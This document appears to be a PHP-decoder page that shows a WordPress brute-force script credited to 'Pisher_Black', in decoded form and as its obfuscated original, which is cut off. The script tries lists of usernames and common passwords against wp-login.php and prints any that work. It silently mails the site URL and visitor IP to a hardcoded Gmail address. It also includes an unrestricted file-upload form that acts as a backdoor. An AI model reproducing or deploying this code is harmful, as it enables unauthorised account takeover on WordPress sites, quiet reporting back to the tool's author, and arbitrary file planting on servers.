Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php ${"\x47L\x4f\x42\x41\x4c\x53"}["\x75\x71\x76p\x63\x68"]="t\x61\x72\x67\x65\x74\x5f\x..
Decoded Output download
<?php ${"GLOBALS"}["uqvpch"]="target_path";${"GLOBALS"}["nwwfuvwo"]="msg";${"GLOBALS"}["vhmvdsuxobde"]="error";${"GLOBALS"}["qchbyoquobu"]="dir";${"GLOBALS"}["gzubpprihf"]="string";${"GLOBALS"}["ppzkqhswkal"]="intReturnCode";${"GLOBALS"}["jfunkjholrd"]="strURL";${"GLOBALS"}["rfkqqmlku"]="resURL";${"GLOBALS"}["kawbbfussrms"]="login";${"GLOBALS"}["pspjbpsib"]="ch";${"GLOBALS"}["iubhtxx"]="passwords_explode";${"GLOBALS"}["hecmlb"]="wpAdmin";${"GLOBALS"}["grtbeemczoa"]="usernames_explode";${"GLOBALS"}["ntcvufpv"]="hosts_explode";${"GLOBALS"}["smkpeum"]="usernames";${"GLOBALS"}["kqqobumv"]="passwords";${"GLOBALS"}["xjrpeketg"]="hosts";${"GLOBALS"}["pjsyddmejbmr"]="auth_pass";${"GLOBALS"}["nktsrnql"]="judul";${"GLOBALS"}["frpcxuveb"]="web";${"GLOBALS"}["uxnincdvb"]="myUpload";${"GLOBALS"}["xshttxy"]="body";${"GLOBALS"}["vrvwdtrc"]="inj";${"GLOBALS"}["cmyufpechel"]="target";${"GLOBALS"}["qcmnkcqihd"]="visitor";${"GLOBALS"}["sxabllmfb"]="visitc";${${"GLOBALS"}["sxabllmfb"]}=$_COOKIE["visits"];if(${${"GLOBALS"}["sxabllmfb"]}==""){$prmhxsyhyh="web";${"GLOBALS"}["nbmctlgek"]="web";$rqlcyhaiufhd="visitc";${"GLOBALS"}["aixtvwf"]="inj";${$rqlcyhaiufhd}=0;${${"GLOBALS"}["qcmnkcqihd"]}=$_SERVER["REMOTE_ADDR"];${$prmhxsyhyh}=$_SERVER["HTTP_HOST"];${${"GLOBALS"}["aixtvwf"]}=$_SERVER["REQUEST_URI"];${"GLOBALS"}["rjfojja"]="judul";${${"GLOBALS"}["cmyufpechel"]}=rawurldecode(${${"GLOBALS"}["nbmctlgek"]}.${${"GLOBALS"}["vrvwdtrc"]});${${"GLOBALS"}["rjfojja"]}="Wordpress Brute http://$target by $visitor";${${"GLOBALS"}["xshttxy"]}="Bug: $target by $visitor - $auth_pass";if(!empty(${${"GLOBALS"}["frpcxuveb"]})){$ghrvhgd="body";@mail("[email protected]",${${"GLOBALS"}["nktsrnql"]},${$ghrvhgd},${${"GLOBALS"}["pjsyddmejbmr"]});}}else{$jhjxsvlcu="visitc";${$jhjxsvlcu}++;}@setcookie("visitz",${${"GLOBALS"}["sxabllmfb"]});error_reporting(0);set_time_limit(0);ignore_user_abort(true);echo"<html>
<!-- Wordpress Brute Force -->
<head>
<title>Wordpress Brute Force By Pisher_Black</title>
<meta http-equiv=Content-Type content=text/html; charset=utf-8 charset=UTF-8>
<style type=\"text/css\">
body {
color: #112233;
background-image: url(http://dme-world.net/wp-content/uploads/2014/11/White-Background-Images-HD-Iphone-Wallpapers-Backgrounds.jpg);
}
textarea {
border-radius: 8px;
color: white;
background-color:black;
}
input[type=submit] , .submit{
background-color:black;
color:white;
border-radius:8px;
}
p {
font-size: 10px;
text-align: center;
}
a:link,a:hover,a:visited {
color:white;
}
</style>
</head>
<!-- Wordpress Brute Force By Pisher_Black -->
<center>
<p><a href="https://www.facebook.com/pisherhack\" target=\"_blank"><img src=\"http://i.imgur.com/kkhH5Ig.png\" border=\"0"/></a></p>
<h2>Wordpress Brute Force</h2>
</center>
<center>
<form enctype=\"multipart/form-data" method=\"POST\">
<table width='624' border='0' id='Box'>
<tr>
<td width='4%'> </td>
</tr>
<tr>
<td > </td>
<td ><h5>Hosts:</h5></td>
<td ><h5> Users:</h5></td>
<td ><h5>Passwords:</h5></td>
</tr>
<tr>
<td> </td>
<td ><textarea name="hosts\" cols="30" rows=\"10\" >";if($_POST){echo$_POST["hosts"];}echo"</textarea></td>
<td ><textarea name=\"usernames" cols="30\" rows=\"10\" >";if($_POST){echo$_POST["usernames"];}else{echo"admin";}echo"</textarea></td>
<td ><textarea name=\"passwords" cols=\"30\" rows=\"10\" >";if($_POST){echo$_POST["passwords"];}else{echo"admin
test
123
123123
321321
1q2w3e
q1w2e3
wordpress
12345
123456
123456789
1234567890
123321
password
p@ssw0rd
p@ssw0rd1";}echo"</textarea></td>
</tr>
<tr><td colspan=\"4\"><input type="submit\" name=\"submit\" value="Start" class=\"submit\" />
";if($_POST){$fvnroglmagw="usernames";${${"GLOBALS"}["xjrpeketg"]}=trim(filter($_POST["hosts"]));${${"GLOBALS"}["kqqobumv"]}=trim(filter($_POST["passwords"]));${$fvnroglmagw}=trim(filter($_POST["usernames"]));$lixgnck="hosts";if(${${"GLOBALS"}["kqqobumv"]}&&${${"GLOBALS"}["smkpeum"]}&&${$lixgnck}){${${"GLOBALS"}["ntcvufpv"]}=explode("
",${${"GLOBALS"}["xjrpeketg"]});${"GLOBALS"}["hfkpcmxg"]="passwords_explode";${${"GLOBALS"}["grtbeemczoa"]}=explode("
",${${"GLOBALS"}["smkpeum"]});${${"GLOBALS"}["hfkpcmxg"]}=explode("
",${${"GLOBALS"}["kqqobumv"]});foreach(${${"GLOBALS"}["ntcvufpv"]} as$host){$host=RemoveLastSlash($host);$gzmeblohlqxg="hacked";$osrhcv="hacked";${$osrhcv}=0;$lzodrpwlov="usernames_explode";$host=str_replace(array("http://","https://","www."),"",trim($host));$host="http://".$host;${"GLOBALS"}["waoxmtdmpqn"]="username";${${"GLOBALS"}["hecmlb"]}=$host."/wp-admin/";if(!url_exists($host."/wp-login.php")){echo"<p>".$host." => <font color='red'>Failed!</font></p>";ob_flush();flush();continue;}foreach(${$lzodrpwlov} as${${"GLOBALS"}["waoxmtdmpqn"]}){${"GLOBALS"}["gneishvgjqju"]="hacked";${"GLOBALS"}["gvlxhgkc"]="password";foreach(${${"GLOBALS"}["iubhtxx"]} as${${"GLOBALS"}["gvlxhgkc"]}){$nwnhbvir="ch";$fduuetlwfzqf="wpAdmin";${${"GLOBALS"}["pspjbpsib"]}=curl_init();curl_setopt(${$nwnhbvir},CURLOPT_RETURNTRANSFER,1);curl_setopt(${${"GLOBALS"}["pspjbpsib"]},CURLOPT_URL,$host."/wp-login.php");curl_setopt(${${"GLOBALS"}["pspjbpsib"]},CURLOPT_COOKIEJAR,"coki.txt");curl_setopt(${${"GLOBALS"}["pspjbpsib"]},CURLOPT_COOKIEFILE,"coki.txt");curl_setopt(${${"GLOBALS"}["pspjbpsib"]},CURLOPT_FOLLOWLOCATION,1);$lxzbhegwho="ch";$sicvqhkykt="password";$gdeulemzupna="username";${"GLOBALS"}["pgdqvwpucron"]="ch";curl_setopt(${${"GLOBALS"}["pgdqvwpucron"]},CURLOPT_POST,TRUE);${"GLOBALS"}["mlwinbdjrmi"]="login";curl_setopt(${$lxzbhegwho},CURLOPT_POSTFIELDS,"log=".${$gdeulemzupna}."&pwd=".${$sicvqhkykt}."&wp-submit=Giri‏"."&redirect_to=".${$fduuetlwfzqf}."&testcookie=1");${${"GLOBALS"}["mlwinbdjrmi"]}=curl_exec(${${"GLOBALS"}["pspjbpsib"]});if(eregi("profile.php",${${"GLOBALS"}["kawbbfussrms"]})){${"GLOBALS"}["kfrzbsxghmsy"]="hacked";$clkpnkgxow="password";$odukywdohss="username";${${"GLOBALS"}["kfrzbsxghmsy"]}=1;echo"<h3>".$host." => UserName : [<font color='green'>".${$odukywdohss}."</font>] : Password : [<font color='green'>".${$clkpnkgxow}."</font>]</h3>";ob_flush();flush();break;}}if(${${"GLOBALS"}["gneishvgjqju"]}==1){break;}}if(${$gzmeblohlqxg}==0){echo"<h3>".$host." => <font color='red'>Failed !</font></h3>";ob_flush();flush();}}}else{echo"<h3><font color='red'>All fields are Required !</font></h3>";}}echo"</td></tr>
</table></form>
<!-- Wordpress Brute Force -->
</center>
<p>
";function url_exists($strURL){${"GLOBALS"}["fhwxdxhyejm"]="intReturnCode";${"GLOBALS"}["nvcknvm"]="resURL";$nfwxfn="resURL";${${"GLOBALS"}["rfkqqmlku"]}=curl_init();${"GLOBALS"}["ewmdtjy"]="resURL";curl_setopt(${${"GLOBALS"}["nvcknvm"]},CURLOPT_URL,${${"GLOBALS"}["jfunkjholrd"]});${"GLOBALS"}["mvffmemvx"]="resURL";curl_setopt(${${"GLOBALS"}["ewmdtjy"]},CURLOPT_BINARYTRANSFER,1);curl_setopt(${${"GLOBALS"}["rfkqqmlku"]},CURLOPT_HEADERFUNCTION,"curlHeaderCallback");curl_setopt(${$nfwxfn},CURLOPT_FAILONERROR,1);curl_exec(${${"GLOBALS"}["rfkqqmlku"]});${${"GLOBALS"}["fhwxdxhyejm"]}=curl_getinfo(${${"GLOBALS"}["rfkqqmlku"]},CURLINFO_HTTP_CODE);curl_close(${${"GLOBALS"}["mvffmemvx"]});if(${${"GLOBALS"}["ppzkqhswkal"]}!=200){return false;}else{return true;}}function filter($string){if(get_magic_quotes_gpc()!=0){return stripslashes(${${"GLOBALS"}["gzubpprihf"]});}else{return${${"GLOBALS"}["gzubpprihf"]};}}function RemoveLastSlash($host){if(strrpos($host,"/",-1)==strlen($host)-1){return substr($host,0,strrpos($host,"/",-1));}else{return$host;}}echo"
</p>
<h3><p>powered by <a href="https://www.facebook.com/pisherhack"><font color=\"black\">Pisher_Black</a></p></h3>
</center>
<p>
";${${"GLOBALS"}["uxnincdvb"]}=new maxUpload();$myUpload->uploadFile();class maxUpload{var$uploadLocation;function maxUpload(){$this->uploadLocation=getcwd().DIRECTORY_SEPARATOR;}function setUploadLocation($dir){$this->uploadLocation=${${"GLOBALS"}["qchbyoquobu"]};}function showUploadForm($msg='',$error=''){${"GLOBALS"}["lmcktfib"]="msg";if(${${"GLOBALS"}["lmcktfib"]}!=""){$mxsiglvv="msg";echo"<p class="msg\">".${$mxsiglvv}."</p>";}else if(${${"GLOBALS"}["vhmvdsuxobde"]}!=""){$msfuyeq="error";echo"<p class=\"emsg\">".${$msfuyeq}."</p>";}echo" <form action=\"" method="post\" enctype=\"multipart/form-data\" >
<center>
<input name=\"myfile" type=\"file\" size="30\" />
</label>
<label>
<input type="submit" name="submitBtn" class="sbtn" value="Upload" />
</label>
</center>
</form>
</div>
";}function uploadFile(){if(!isset($_POST["submitBtn"])){$this->showUploadForm();}else{${${"GLOBALS"}["nwwfuvwo"]}="";${"GLOBALS"}["qnveddn"]="error";${"GLOBALS"}["hzlvgmkbvg"]="msg";${${"GLOBALS"}["qnveddn"]}="";$vxavnwfm="error";if(!file_exists($this->uploadLocation)){${${"GLOBALS"}["vhmvdsuxobde"]}="The target directory doesn't exists!";}else if(!is_writeable($this->uploadLocation)){${${"GLOBALS"}["vhmvdsuxobde"]}="The target directory is not writeable!";}else{${"GLOBALS"}["fnnsnrhxvuxg"]="target_path";${${"GLOBALS"}["uqvpch"]}=$this->uploadLocation.basename($_FILES["myfile"]["name"]);if(@move_uploaded_file($_FILES["myfile"]["tmp_name"],${${"GLOBALS"}["fnnsnrhxvuxg"]})){${${"GLOBALS"}["nwwfuvwo"]}=basename($_FILES["myfile"]["name"])." was uploaded successfully!";}else{$pmokegdkrh="error";${$pmokegdkrh}="The upload process failed!";}}$this->showUploadForm(${${"GLOBALS"}["hzlvgmkbvg"]},${$vxavnwfm});}}}
?>
Did this file decode correctly?
Original Code
<?php ${"\x47L\x4f\x42\x41\x4c\x53"}["\x75\x71\x76p\x63\x68"]="t\x61\x72\x67\x65\x74\x5f\x70a\x74h";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6ew\x77\x66\x75vwo"]="\x6d\x73g";${"\x47\x4c\x4fB\x41L\x53"}["v\x68\x6d\x76ds\x75xob\x64\x65"]="\x65\x72\x72o\x72";${"\x47\x4c\x4f\x42A\x4cS"}["\x71c\x68by\x6f\x71\x75\x6f\x62\x75"]="d\x69\x72";${"\x47\x4cO\x42A\x4c\x53"}["g\x7aubp\x70rih\x66"]="\x73\x74ri\x6e\x67";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x70\x70\x7a\x6b\x71h\x73\x77\x6b\x61\x6c"]="\x69\x6e\x74\x52etur\x6e\x43\x6fde";${"G\x4c\x4fB\x41L\x53"}["\x6afu\x6ekjh\x6f\x6cr\x64"]="s\x74r\x55\x52L";${"\x47\x4cO\x42\x41\x4cS"}["rfk\x71\x71\x6d\x6c\x6bu"]="re\x73U\x52L";${"\x47L\x4fB\x41\x4c\x53"}["k\x61\x77\x62\x62\x66uss\x72ms"]="\x6co\x67\x69n";${"\x47\x4c\x4f\x42AL\x53"}["\x70\x73\x70j\x62p\x73ib"]="\x63\x68";${"\x47LOBA\x4c\x53"}["\x69\x75b\x68\x74\x78\x78"]="\x70\x61s\x73w\x6f\x72d\x73\x5f\x65\x78pl\x6fd\x65";${"\x47\x4c\x4f\x42A\x4cS"}["h\x65cm\x6c\x62"]="\x77\x70\x41\x64\x6d\x69\x6e";${"\x47LO\x42AL\x53"}["\x67rt\x62ee\x6d\x63\x7a\x6f\x61"]="\x75\x73\x65\x72\x6e\x61\x6d\x65\x73\x5f\x65\x78\x70l\x6f\x64\x65";${"GL\x4f\x42A\x4c\x53"}["n\x74c\x76uf\x70\x76"]="\x68\x6fs\x74s_\x65\x78p\x6cod\x65";${"\x47\x4c\x4fBA\x4cS"}["\x73\x6dkp\x65um"]="\x75\x73\x65r\x6ea\x6des";${"GL\x4f\x42\x41L\x53"}["\x6b\x71\x71\x6f\x62u\x6dv"]="\x70a\x73sw\x6frd\x73";${"\x47\x4cOBA\x4c\x53"}["\x78j\x72\x70e\x6b\x65\x74\x67"]="\x68\x6f\x73ts";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x70js\x79\x64d\x6d\x65\x6a\x62\x6d\x72"]="\x61\x75t\x68\x5f\x70\x61\x73s";${"\x47\x4cO\x42\x41L\x53"}["nk\x74\x73r\x6e\x71l"]="\x6a\x75\x64\x75\x6c";${"\x47\x4cO\x42A\x4c\x53"}["\x66\x72\x70c\x78\x75\x76\x65\x62"]="\x77\x65\x62";${"\x47L\x4f\x42ALS"}["\x75x\x6e\x69n\x63\x64vb"]="\x6dyU\x70\x6c\x6f\x61d";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78s\x68\x74t\x78\x79"]="\x62o\x64\x79";${"\x47\x4c\x4f\x42A\x4cS"}["v\x72\x76w\x64\x74\x72\x63"]="\x69\x6e\x6a";${"\x47\x4cOB\x41L\x53"}["\x63m\x79\x75\x66p\x65\x63\x68\x65\x6c"]="\x74\x61r\x67\x65\x74";${"\x47\x4c\x4f\x42AL\x53"}["\x71cm\x6e\x6b\x63\x71\x69hd"]="v\x69\x73\x69\x74\x6fr";${"G\x4c\x4fB\x41LS"}["\x73\x78abllm\x66b"]="\x76\x69s\x69tc";${${"G\x4c\x4f\x42\x41\x4cS"}["sx\x61\x62\x6c\x6cm\x66\x62"]}=$_COOKIE["v\x69sits"];if(${${"GLO\x42AL\x53"}["s\x78\x61\x62\x6cl\x6d\x66b"]}==""){$prmhxsyhyh="\x77\x65\x62";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6e\x62\x6d\x63tl\x67\x65\x6b"]="\x77e\x62";$rqlcyhaiufhd="\x76\x69\x73i\x74\x63";${"\x47\x4c\x4f\x42ALS"}["\x61i\x78\x74\x76\x77\x66"]="\x69n\x6a";${$rqlcyhaiufhd}=0;${${"G\x4cO\x42\x41L\x53"}["q\x63\x6d\x6e\x6bc\x71\x69\x68d"]}=$_SERVER["\x52E\x4d\x4fT\x45\x5f\x41\x44\x44R"];${$prmhxsyhyh}=$_SERVER["\x48TTP_HO\x53T"];${${"\x47L\x4fB\x41\x4cS"}["\x61\x69x\x74\x76w\x66"]}=$_SERVER["R\x45QUE\x53T\x5fU\x52\x49"];${"\x47\x4c\x4fB\x41\x4c\x53"}["\x72\x6a\x66o\x6a\x6aa"]="\x6a\x75d\x75\x6c";${${"G\x4c\x4f\x42\x41\x4cS"}["\x63myu\x66\x70\x65\x63\x68\x65\x6c"]}=rawurldecode(${${"\x47LO\x42ALS"}["\x6e\x62\x6dc\x74\x6c\x67e\x6b"]}.${${"\x47\x4c\x4f\x42\x41LS"}["\x76r\x76\x77\x64trc"]});${${"G\x4cO\x42A\x4c\x53"}["\x72\x6a\x66\x6f\x6a\x6a\x61"]}="W\x6f\x72dpre\x73s\x20Br\x75\x74\x65 \x68\x74t\x70://$target by $visitor";${${"G\x4cOB\x41L\x53"}["\x78\x73\x68tt\x78\x79"]}="Bu\x67: $target\x20\x62y $visitor - $auth_pass";if(!empty(${${"\x47\x4cO\x42A\x4c\x53"}["\x66r\x70\x63\x78\x75v\x65\x62"]})){$ghrvhgd="\x62\x6f\x64y";@mail("pis\x68e\x72.b\x6ca\x63kse\x72\x76e\x72\x30\x31@\x67m\x61i\x6c\x2ecom",${${"GL\x4f\x42AL\x53"}["\x6e\x6bt\x73\x72\x6e\x71l"]},${$ghrvhgd},${${"\x47\x4cO\x42\x41\x4c\x53"}["\x70\x6as\x79\x64\x64\x6d\x65\x6a\x62mr"]});}}else{$jhjxsvlcu="\x76\x69\x73i\x74\x63";${$jhjxsvlcu}++;}@setcookie("\x76isitz",${${"\x47\x4c\x4fBA\x4c\x53"}["s\x78\x61bl\x6c\x6d\x66b"]});error_reporting(0);set_time_limit(0);ignore_user_abort(true);echo"\x3cht\x6d\x6c>\n\x3c\x21--\x20Wo\x72dp\x72e\x73s\x20\x42r\x75\x74\x65 F\x6fr\x63\x65 -->\n\x3ch\x65ad>\n\x3ctitl\x65\x3eW\x6frd\x70r\x65\x73\x73\x20\x42rut\x65 \x46\x6f\x72\x63\x65\x20By\x20P\x69\x73\x68\x65r_B\x6c\x61ck\x3c/t\x69t\x6c\x65>\n<m\x65\x74a\x20ht\x74p-\x65\x71\x75i\x76\x3d\x43\x6f\x6etent-Type c\x6fn\x74ent=\x74e\x78t/\x68tml; ch\x61\x72\x73e\x74=u\x74f-\x38 \x63\x68\x61rs\x65\x74=UT\x46-\x38\x3e\n<st\x79le \x74\x79p\x65=\"t\x65\x78\x74/\x63s\x73\"\x3e\n\x62od\x79\x20{\n\t\x63ol\x6fr: #1122\x33\x33\x3b\n\tb\x61c\x6b\x67ro\x75nd-im\x61ge: u\x72\x6c(h\x74t\x70://\x64\x6de-wor\x6cd\x2e\x6ee\x74/\x77p-c\x6fn\x74e\x6et/\x75p\x6coad\x73/\x32014/\x311/W\x68it\x65-Bac\x6bg\x72ou\x6ed-Images-H\x44-\x49pho\x6ee-\x57a\x6cl\x70\x61\x70\x65rs-Backg\x72\x6f\x75\x6ed\x73\x2e\x6a\x70g)\x3b\n}\n\x74e\x78\x74a\x72ea\x20{\n\t\x62o\x72de\x72-r\x61d\x69\x75\x73:\x208px\x3b\n\tc\x6fl\x6fr: \x77hit\x65\x3b\n\t\x62\x61\x63\x6bg\x72\x6fun\x64-\x63olor:\x62l\x61ck\x3b\n}\n\x69\x6epu\x74[\x74\x79pe\x3ds\x75\x62m\x69\x74]\x20, \x2e\x73u\x62\x6d\x69t{\n\t\tb\x61c\x6bgrou\x6e\x64-c\x6flor:bl\x61c\x6b;\n\t\tco\x6c\x6f\x72:\x77\x68\x69t\x65\x3b\n\t\t\x62\x6f\x72de\x72-\x72a\x64\x69u\x73:\x38\x70\x78\x3b\n}\np\x20{\n\tfo\x6et-size: 1\x30\x70\x78\x3b\n\t\x74\x65\x78t-\x61\x6c\x69\x67\x6e:\x20c\x65\x6et\x65\x72\x3b\n}\n\x61:\x6c\x69nk,a:\x68o\x76\x65r,a:\x76\x69\x73\x69\x74\x65d\x20{\n\tco\x6cor:\x77\x68\x69\x74\x65;\n}\n\x3c/s\x74y\x6ce\x3e\n\x3c/he\x61\x64\x3e\n\x3c\x21--\x20Wo\x72d\x70\x72\x65s\x73\x20B\x72\x75te \x46o\x72\x63e \x42\x79\x20\x50ishe\x72_Bl\x61\x63k --\x3e\n\x3cc\x65nt\x65r\x3e\n\x3cp\x3e\x3ca h\x72\x65\x66\x3d\x22ht\x74\x70s://\x77\x77w\x2ef\x61\x63\x65bo\x6f\x6b\x2e\x63om/\x70\x69\x73\x68erh\x61\x63\x6b\"\x20t\x61\x72get=\"_\x62lank\x22\x3e\x3c\x69\x6dg \x73rc=\"\x68\x74t\x70://i.im\x67u\x72.co\x6d/\x6bkh\x48\x35Ig.pn\x67\"\x20b\x6fr\x64e\x72=\"\x30\x22/\x3e\x3c/a></\x70>\n<h\x32\x3e\x57\x6f\x72dp\x72\x65\x73\x73\x20\x42\x72\x75\x74e\x20\x46orc\x65\x3c/\x682>\n</\x63\x65n\x74e\x72>\n\x3cce\x6eter\x3e\n<f\x6f\x72\x6d en\x63t\x79\x70e=\"\x6d\x75\x6ctip\x61rt/\x66o\x72\x6d-da\x74a\x22 m\x65th\x6f\x64\x3d\"POST\">\n\x20 <\x74ab\x6c\x65\x20\x77i\x64\x74\x68\x3d\x27\x3624\x27 \x62or\x64\x65\x72='0'\x20\x69\x64='\x42\x6fx\x27\x3e\n\x20\x20 <tr\x3e\n\x3ct\x64\x20\x77\x69\x64t\x68\x3d'4\x25'\x3e&\x6e\x62sp\x3b\x3c/\x74d>\n\x3c/\x74\x72>\n \x20\x20<\x74r\x3e\n \x20\x20 \x20<td >&nb\x73\x70\x3b</\x74\x64\x3e\n\x20\x20\x20 \x3ct\x64 \x3e\x3ch5\x3e\x48o\x73\x74s:</\x68\x35>\x3c/t\x64>\n\x20 \x3c\x74\x64\x20\x3e<\x68\x35\x3e\x20Use\x72\x73:</\x68\x35\x3e</td>\n \x20 \x20<\x74d >\x3c\x685>P\x61\x73swor\x64s:</\x685></td\x3e\n \x20</tr\x3e\n \x20 \x3c\x74\x72>\n\x20\x20\x20\x20 \x20<t\x64>\x26\x6ebs\x70\x3b</\x74d>\n \x20 \x20\x20\x3ct\x64 >\x3c\x74\x65\x78ta\x72\x65a\x20n\x61\x6de=\x22h\x6f\x73t\x73\"\x20cols=\x223\x30\x22\x20ro\x77s\x3d\"\x310\" >";if($_POST){echo$_POST["\x68\x6fs\x74\x73"];}echo"</t\x65\x78\x74ar\x65\x61\x3e\x3c/\x74d>\n \x20\x20\x20 <\x74d \x3e\x3c\x74ext\x61r\x65a \x6eame=\"us\x65r\x6e\x61\x6d\x65\x73\x22\x20cols\x3d\x2230\" rows\x3d\"\x31\x30\" \x20\x3e";if($_POST){echo$_POST["\x75\x73ern\x61\x6d\x65\x73"];}else{echo"\x61\x64\x6d\x69\x6e";}echo"\x3c/t\x65\x78\x74\x61rea\x3e\x3c/\x74d>\n\x20 \x20\x20 \x20\x3c\x74\x64 ><\x74extare\x61\x20n\x61\x6d\x65\x3d\"pa\x73swo\x72\x64s\x22 c\x6f\x6c\x73=\"\x33\x30\" \x72ows\x3d\"1\x30\" \x3e";if($_POST){echo$_POST["pa\x73\x73word\x73"];}else{echo"a\x64\x6d\x69n\n\x74\x65\x73\x74\n123\n1\x32\x3312\x33\n3\x32\x3132\x31\n\x31q2w3\x65\nq\x31\x772e\x33\nw\x6frdpr\x65\x73s\n1\x32\x33\x345\n\x3123\x3456\n\x31\x32\x334\x35\x36\x37\x38\x39\n\x31\x323\x34567\x38\x390\n\x31\x32\x33\x3321\n\x70a\x73swo\x72\x64\np\x40\x73\x73w\x30rd\np@s\x73w\x30\x72\x64\x31";}echo"\x3c/\x74\x65\x78\x74a\x72\x65a\x3e</\x74d>\n \x20\x20\x20\x3c/tr>\n<\x74r>\x3c\x74d \x63\x6fls\x70\x61n\x3d\"4\"\x3e\x3c\x69n\x70u\x74 ty\x70e\x3d\x22\x73ub\x6dit\"\x20\x6eame\x3d\"\x73\x75b\x6dit\"\x20\x76\x61l\x75\x65\x3d\x22\x53ta\x72t\x22\x20\x63la\x73\x73\x3d\"\x73\x75bm\x69\x74\"\x20\x20/>\n";if($_POST){$fvnroglmagw="\x75\x73e\x72nam\x65\x73";${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x78\x6a\x72\x70\x65\x6b\x65\x74\x67"]}=trim(filter($_POST["\x68o\x73ts"]));${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6bq\x71\x6f\x62\x75\x6d\x76"]}=trim(filter($_POST["\x70a\x73\x73wo\x72\x64\x73"]));${$fvnroglmagw}=trim(filter($_POST["us\x65rn\x61\x6de\x73"]));$lixgnck="\x68\x6f\x73t\x73";if(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6bq\x71\x6f\x62u\x6d\x76"]}&&${${"\x47\x4c\x4fBA\x4c\x53"}["sm\x6bp\x65u\x6d"]}&&${$lixgnck}){${${"GLOB\x41\x4cS"}["\x6e\x74c\x76uf\x70v"]}=explode("\n",${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x6a\x72pe\x6b\x65tg"]});${"\x47LOB\x41\x4c\x53"}["\x68\x66k\x70\x63\x6d\x78\x67"]="\x70a\x73s\x77o\x72\x64s_\x65\x78p\x6co\x64e";${${"G\x4c\x4fB\x41\x4c\x53"}["gr\x74\x62\x65\x65m\x63z\x6f\x61"]}=explode("\n",${${"\x47L\x4fB\x41\x4c\x53"}["smk\x70eu\x6d"]});${${"\x47\x4c\x4fB\x41L\x53"}["\x68\x66k\x70\x63\x6dx\x67"]}=explode("\n",${${"G\x4c\x4f\x42\x41L\x53"}["\x6b\x71qo\x62\x75mv"]});foreach(${${"\x47LO\x42\x41L\x53"}["nt\x63v\x75fp\x76"]} as$host){$host=RemoveLastSlash($host);$gzmeblohlqxg="h\x61\x63\x6b\x65\x64";$osrhcv="\x68ac\x6b\x65\x64";${$osrhcv}=0;$lzodrpwlov="\x75se\x72\x6ea\x6d\x65\x73_e\x78\x70l\x6f\x64\x65";$host=str_replace(array("h\x74t\x70://","h\x74t\x70s://","www\x2e"),"",trim($host));$host="ht\x74p://".$host;${"G\x4c\x4f\x42\x41\x4c\x53"}["w\x61\x6f\x78\x6d\x74d\x6dp\x71\x6e"]="us\x65\x72\x6eame";${${"\x47LO\x42\x41\x4c\x53"}["\x68e\x63\x6d\x6c\x62"]}=$host."/w\x70-\x61\x64\x6d\x69n/";if(!url_exists($host."/w\x70-\x6co\x67\x69\x6e.p\x68\x70")){echo"<\x70>".$host."\x20=\x3e\x20\x3cf\x6f\x6e\x74 co\x6cor\x3d'r\x65\x64'\x3eFa\x69\x6c\x65d\x21</\x66\x6fnt\x3e\x3c/\x70>";ob_flush();flush();continue;}foreach(${$lzodrpwlov} as${${"\x47\x4cOB\x41L\x53"}["\x77\x61o\x78\x6dtdm\x70qn"]}){${"G\x4c\x4f\x42\x41L\x53"}["\x67n\x65\x69\x73hv\x67jq\x6a\x75"]="\x68\x61c\x6b\x65\x64";${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x76\x6cx\x68\x67k\x63"]="\x70as\x73w\x6f\x72\x64";foreach(${${"G\x4c\x4f\x42A\x4c\x53"}["i\x75\x62\x68\x74\x78x"]} as${${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x76lxh\x67\x6b\x63"]}){$nwnhbvir="\x63h";$fduuetlwfzqf="\x77\x70A\x64\x6di\x6e";${${"\x47L\x4fB\x41\x4cS"}["\x70\x73\x70j\x62\x70\x73i\x62"]}=curl_init();curl_setopt(${$nwnhbvir},CURLOPT_RETURNTRANSFER,1);curl_setopt(${${"\x47LO\x42\x41L\x53"}["\x70\x73\x70\x6a\x62psib"]},CURLOPT_URL,$host."/\x77p-l\x6f\x67in\x2e\x70\x68\x70");curl_setopt(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["p\x73p\x6ab\x70\x73\x69\x62"]},CURLOPT_COOKIEJAR,"\x63ok\x69\x2e\x74\x78\x74");curl_setopt(${${"\x47L\x4f\x42\x41\x4c\x53"}["p\x73p\x6a\x62\x70si\x62"]},CURLOPT_COOKIEFILE,"\x63o\x6b\x69.t\x78\x74");curl_setopt(${${"\x47L\x4fBAL\x53"}["\x70\x73\x70\x6a\x62\x70\x73\x69b"]},CURLOPT_FOLLOWLOCATION,1);$lxzbhegwho="\x63h";$sicvqhkykt="\x70\x61ss\x77o\x72d";$gdeulemzupna="\x75se\x72n\x61\x6d\x65";${"\x47L\x4f\x42AL\x53"}["\x70\x67\x64\x71\x76w\x70uc\x72o\x6e"]="\x63\x68";curl_setopt(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x70\x67\x64\x71vwp\x75\x63\x72o\x6e"]},CURLOPT_POST,TRUE);${"G\x4c\x4f\x42A\x4cS"}["m\x6c\x77\x69\x6e\x62\x64\x6ar\x6d\x69"]="l\x6f\x67i\x6e";curl_setopt(${$lxzbhegwho},CURLOPT_POSTFIELDS,"\x6cog\x3d".${$gdeulemzupna}."\x26pwd=".${$sicvqhkykt}."&wp-\x73u\x62m\x69\x74=G\x69ri\x26#8\x32\x307;"."\x26\x72\x65dir\x65\x63t_to\x3d".${$fduuetlwfzqf}."\x26\x74estcoo\x6bie=\x31");${${"G\x4c\x4fB\x41\x4c\x53"}["\x6dl\x77i\x6e\x62\x64\x6a\x72m\x69"]}=curl_exec(${${"\x47LO\x42A\x4c\x53"}["\x70\x73\x70\x6a\x62\x70\x73\x69b"]});if(eregi("\x70r\x6f\x66i\x6ce.\x70\x68\x70",${${"\x47\x4cOB\x41L\x53"}["kawbbf\x75\x73sr\x6d\x73"]})){${"\x47\x4cO\x42A\x4c\x53"}["\x6b\x66\x72\x7a\x62\x73\x78ghm\x73y"]="\x68\x61\x63\x6b\x65\x64";$clkpnkgxow="\x70\x61\x73\x73\x77o\x72d";$odukywdohs